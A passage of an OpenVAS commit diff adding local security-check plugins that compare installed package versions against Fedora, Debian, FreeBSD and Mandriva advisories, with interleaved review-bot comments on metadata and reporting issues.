http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"mediawiki1.7", ver:"1.7.1-9etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"mediawiki1.7-math", ver:"1.7.1-9etch1", rls:"DEB4.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/fcore_2009_10165.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10165.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10165.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
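Review bot: in deb_1901_1.nasl the description block sets script_version ("$"), a literal dollar sign, so the plugin reports no revision even though the header comment carries an intact $Id$ keyword. Use a keyword that Subversion expands, such as script_version("$Revision$"), and set svn:keywords on the file. The same literal appears in the other scripts added by this commit.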
@@ -0,0 +1,181 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10165 (kernel) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64999); + script_cve_id("CVE-2009-2903", "CVE-2009-3290", "CVE-2009-2847", "CVE-2009-2692", "CVE-2009-2406", "CVE-2009-2407", "CVE-2009-1895", "CVE-2009-1897", "CVE-2009-0065", "CVE-2008-5079", "CVE-2009-3001", "CVE-2009-3002"); + script_version ("$"); + script_name("Fedora Core 10 FEDORA-2009-10165 (kernel)"); + + desc = " +The remote host is missing an update to kernel +announced via advisory FEDORA-2009-10165. 
+ +Update Information: + +Update to kernel 2.6.27.35: +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.31 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.32 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.33 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.34 +http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.35 + +ChangeLog: + +* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.94 +- Backport appletalk: Fix skb leak when ipddp interface is not loaded +(fixes CVE-2009-2903) +* Sat Sep 26 2009 Chuck Ebbert 2.6.27.35-170.2.93 +- Backport KVM: x86: Disallow hypercalls for guest callers in rings > 0 +(fixes CVE-2009-3290) +* Thu Sep 24 2009 Chuck Ebbert 2.6.27.35-170.2.92 +- Linux 2.6.27.35 +- Drop merged patches: +linux-2.6-nfsd-report-short-writes-fix.patch +linux-2.6-nfsd-report-short-writes.patch +* Tue Sep 15 2009 Chuck Ebbert 2.6.27.34-170.2.91 +- Linux 2.6.27.34 +- Drop merged patch: linux-2.6-slub-fix-destroy-by-rcu.patch +* Wed Sep 9 2009 Chuck Ebbert 2.6.27.32-170.2.90 +- 2.6.27.32 final +- Drop linux-2.6-ocfs2-handle-len-0.patch, added after .32-rc1 +* Mon Sep 7 2009 Chuck Ebbert 2.6.27.32-170.2.89.rc1 +- Backport fix for b43 on ppc64 to 2.6.27 (#514787) +* Sun Sep 6 2009 Chuck Ebbert 2.6.27.32-170.2.88.rc1 +- Add patches requested for the next stable release: +linux-2.6-slub-fix-destroy-by-rcu.patch (fixes bug in 2.6.27.29) +linux-2.6-ocfs2-handle-len-0.patch (fixes bug in 2.6.27.32-rc1) +* Fri Sep 4 2009 Chuck Ebbert 2.6.27.32-170.2.87.rc1 +- Copy fix for NFS short write reporting from F-10 2.6.29 kernel (#493500) + +References: + +[ 1 ] Bug #515392 - CVE-2009-2847 kernel: information leak in sigaltstack +https://bugzilla.redhat.com/show_bug.cgi?id=515392 +[ 2 ] Bug #524124 - CVE-2009-3290 kernel: KVM: x86: Disallow hypercalls for guest callers in rings > 0 +https://bugzilla.redhat.com/show_bug.cgi?id=524124 +[ 3 ] Bug #522331 - CVE-2009-2903 kernel: appletalk: denial of service when handling IP 
tunnelled over DDP datagrams +https://bugzilla.redhat.com/show_bug.cgi?id=522331 +[ 4 ] Bug #519305 - CVE-2009-3001, CVE-2009-3002 kernel: numerous getname() infoleaks +https://bugzilla.redhat.com/show_bug.cgi?id=519305 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update kernel' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10165 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 10 FEDORA-2009-10165 (kernel)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debuginfo-common", rpm:"kernel-debuginfo-common~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE", rpm:"kernel-PAE~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-devel", rpm:"kernel-PAE-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAEdebug", rpm:"kernel-PAEdebug~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} 
+if(isrpmvuln(pkg:"kernel-PAEdebug-devel", rpm:"kernel-PAEdebug-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAE-debuginfo", rpm:"kernel-PAE-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-PAEdebug-debuginfo", rpm:"kernel-PAEdebug-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-firmware", rpm:"kernel-firmware~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-bootwrapper", rpm:"kernel-bootwrapper~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp", rpm:"kernel-smp~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp-devel", rpm:"kernel-smp-devel~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kernel-smp-debuginfo", rpm:"kernel-smp-debuginfo~2.6.27.35~170.2.94.fc10", rls:"FC10")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/fcore_2009_10172.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10172.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10172.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
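Review bot: in fcore_2009_10165.nasl, script_cve_id lists twelve CVEs, but the description text only accounts for five of them (CVE-2009-2903, CVE-2009-3290, CVE-2009-2847, CVE-2009-3001, CVE-2009-3002). CVE-2009-2692, CVE-2009-2406, CVE-2009-2407, CVE-2009-1895, CVE-2009-1897, CVE-2009-0065 and CVE-2008-5079 appear nowhere in the changelog or references quoted in desc, so a reader of the report cannot tell why they are attached to this update. Either add a line to desc saying which earlier advisory they come from, or limit the list to the CVEs this advisory names.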
@@ -0,0 +1,140 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10172 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65001); + script_cve_id("CVE-2009-2813", "CVE-2009-2948", "CVE-2009-2906", "CVE-2009-0022", "CVE-2008-4314"); + script_version ("$"); + script_name("Fedora Core 10 FEDORA-2009-10172 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory FEDORA-2009-10172. 
+ +Update Information: + +Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +ChangeLog: + +* Thu Oct 1 2009 Guenther Deschner - 3.2.15-0.36 +- Update to 3.2.15 +- Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +References: + +[ 1 ] Bug #523752 - CVE-2009-2813 Samba: Share restriction bypass via home-less directory user account(s) +https://bugzilla.redhat.com/show_bug.cgi?id=523752 +[ 2 ] Bug #526074 - CVE-2009-2948 samba: information disclosure in suid mount.cifs +https://bugzilla.redhat.com/show_bug.cgi?id=526074 +[ 3 ] Bug #526645 - CVE-2009-2906 samba: infinite loop flaw in smbd on unexpected oplock break notification reply +https://bugzilla.redhat.com/show_bug.cgi?id=526645 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update samba' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10172 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 10 FEDORA-2009-10172 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libsmbclient", rpm:"libsmbclient~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libsmbclient-devel", rpm:"libsmbclient-devel~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtalloc", rpm:"libtalloc~1.2.0~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtalloc-devel", rpm:"libtalloc-devel~1.2.0~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtdb", rpm:"libtdb~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libtdb-devel", rpm:"libtdb-devel~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba", rpm:"samba~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-client", rpm:"samba-client~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-common", rpm:"samba-common~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-doc", rpm:"samba-doc~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-domainjoin-gui", rpm:"samba-domainjoin-gui~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-swat", rpm:"samba-swat~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind", rpm:"samba-winbind~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind-devel", rpm:"samba-winbind-devel~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"tdb-tools", rpm:"tdb-tools~1.1.1~36.fc10", rls:"FC10")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-debuginfo", rpm:"samba-debuginfo~3.2.15~0.36.fc10", rls:"FC10")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: 
trunk/openvas-plugins/scripts/fcore_2009_10180.nasl =================================================================== --- trunk/openvas-plugins/scripts/fcore_2009_10180.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/fcore_2009_10180.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,127 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory FEDORA-2009-10180 (samba) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65000); + script_cve_id("CVE-2009-2813", "CVE-2009-2948", "CVE-2009-2906"); + script_version ("$"); + script_name("Fedora Core 11 FEDORA-2009-10180 (samba)"); + + desc = " +The remote host is missing an update to samba +announced via advisory FEDORA-2009-10180. 
+ +Update Information: + +Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 + +ChangeLog: + +* Thu Oct 1 2009 Guenther Deschner - 3.4.2-0.42 +- Update to 3.4.2 +- Security Release, fixes CVE-2009-2813, CVE-2009-2948 and CVE-2009-2906 +* Wed Sep 9 2009 Guenther Deschner - 3.4.1.0-41 +- Update to 3.4.1 + +References: + +[ 1 ] Bug #523752 - CVE-2009-2813 Samba: Share restriction bypass via home-less directory user account(s) +https://bugzilla.redhat.com/show_bug.cgi?id=523752 +[ 2 ] Bug #526074 - CVE-2009-2948 samba: information disclosure in suid mount.cifs +https://bugzilla.redhat.com/show_bug.cgi?id=526074 +[ 3 ] Bug #526645 - CVE-2009-2906 samba: infinite loop flaw in smbd on unexpected oplock break notification reply +https://bugzilla.redhat.com/show_bug.cgi?id=526645 + +Solution: Apply the appropriate updates. + +This update can be installed with the yum update program. Use +su -c 'yum update samba' at the command line. +For more information, refer to Managing Software with yum, +available at http://docs.fedoraproject.org/yum/. + +https://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10180 + +Risk factor : High"; + + script_description(desc); + + script_summary("Fedora Core 11 FEDORA-2009-10180 (samba)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"libsmbclient", rpm:"libsmbclient~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"libsmbclient-devel", rpm:"libsmbclient-devel~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba", rpm:"samba~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-client", rpm:"samba-client~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-common", rpm:"samba-common~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-doc", rpm:"samba-doc~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-domainjoin-gui", rpm:"samba-domainjoin-gui~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-swat", rpm:"samba-swat~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind", rpm:"samba-winbind~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-winbind-devel", rpm:"samba-winbind-devel~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} +if(isrpmvuln(pkg:"samba-debuginfo", rpm:"samba-debuginfo~3.4.2~0.42.fc11", rls:"FC11")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsd_mybb.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsd_mybb.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsd_mybb.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,82 @@ +# +#VID beb6f4a8-add5-11de-8b55-0030843d3802 +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from VID beb6f4a8-add5-11de-8b55-0030843d3802 +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65012); + script_bugtraq_id(36460); + script_version ("$"); + script_name("FreeBSD Ports: mybb"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory. + +The following package is affected: mybb + +Solution: +Update your system with the appropriate patches or +software upgrades. + +http://dev.mybboard.net/issues/464 +http://dev.mybboard.net/issues/418 +http://secunia.com/advisories/36803 +http://blog.mybboard.net/2009/09/21/mybb-1-4-9-released-security-update/ +http://www.vuxml.org/freebsd/beb6f4a8-add5-11de-8b55-0030843d3802.html + +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Ports: mybb"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdrel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +bver = portver(pkg:"mybb"); +if(!isnull(bver) && revcomp(a:bver, b:"1.4.9")<0) { + security_note(0, data:"Package mybb version " + bver + " is installed which is known to be vulnerable."); + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsdsa_devfs1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
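Review bot: in freebsd_mybb.nasl the vulnerable branch reports the same finding twice: it calls security_note(0, data:...) with the installed version and then sets vuln = 1, so the closing if(vuln) block also raises security_hole(0) at a different severity. Pass the version message as data: to the single security_hole call and drop the security_note, so one result with the version detail is produced. The description block also registers only script_bugtraq_id(36460); add a script_cve_id if the referenced advisories assign one.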
@@ -0,0 +1,90 @@ +# +#ADV FreeBSD-SA-09:14.devfs.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-09:14.devfs.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65014); + script_version ("$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-09:14.devfs.asc)"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-09:14.devfs.asc + +The device file system (devfs) provides access to system devices, such as +storage devices and serial ports, via the file system namespace. + +VFS is the Virtual File System, which abstracts file system operations in +the kernel from the actual underlying file system. + +Due to the interaction between devfs and VFS, a race condition exists +where the kernel might dereference a NULL pointer. 
+ +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-09:14.devfs.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-09:14.devfs.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"7.2", patchlevel:"4")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.1", patchlevel:"8")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.4", patchlevel:"7")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"13")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/freebsdsa_pipe1.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
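Review bot: in freebsdsa_devfs1.nasl the description block registers neither script_cve_id nor script_bugtraq_id, so the result can only be correlated through the advisory name FreeBSD-SA-09:14.devfs in the title and text. Add the identifier from the advisory if one is assigned. The four patchlevelcmp checks cover releases 7.2, 7.1, 6.4 and 6.3 only; a short comment stating what patchlevelcmp returns for a host on any other release would document that the script stays silent there instead of flagging it.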
@@ -0,0 +1,84 @@ +# +#ADV FreeBSD-SA-09:13.pipe.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-09:13.pipe.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65013); + script_version ("$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-09:13.pipe.asc)"); + + desc = " +The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-09:13.pipe.asc + +Pipes are a form of inter-process communication (IPC) provided by the +FreeBSD kernel. kqueue is an event management API that applications can +use to monitor pipes and other kernel services. + +A race condition exists in the pipe close() code relating to kqueues, +causing use-after-free for kernel memory, which may lead to an +exploitable NULL pointer vulnerability in the kernel, kernel memory +corruption, and other unpredictable results. 
+ +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-09:13.pipe.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-09:13.pipe.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"6.4", patchlevel:"7")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"13")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/mdksa_2009_249.nasl =================================================================== --- trunk/openvas-plugins/scripts/mdksa_2009_249.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/mdksa_2009_249.nasl 2009-10-06 00:49:40 UTC (rev 5378) 
@@ -0,0 +1,185 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory MDVSA-2009:249 (newt) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64995); + script_cve_id("CVE-2009-2905"); + script_version ("$"); + script_name("Mandrake Security Advisory MDVSA-2009:249 (newt)"); + + desc = " +The remote host is missing an update to newt +announced via advisory MDVSA-2009:249. + +A vulnerability was discovered and corrected in newt: + +A heap-based buffer overflow flaw was found in the way newt processes +content that is to be displayed in a text dialog box. A local attacker +could issue a specially-crafted text dialog box display request +(direct or via a custom application), leading to a denial of service +(application crash) or, potentially, arbitrary code execution with the +privileges of the user running the application using the newt library +(CVE-2009-2905). + +This update provides a solution to this vulnerability. 
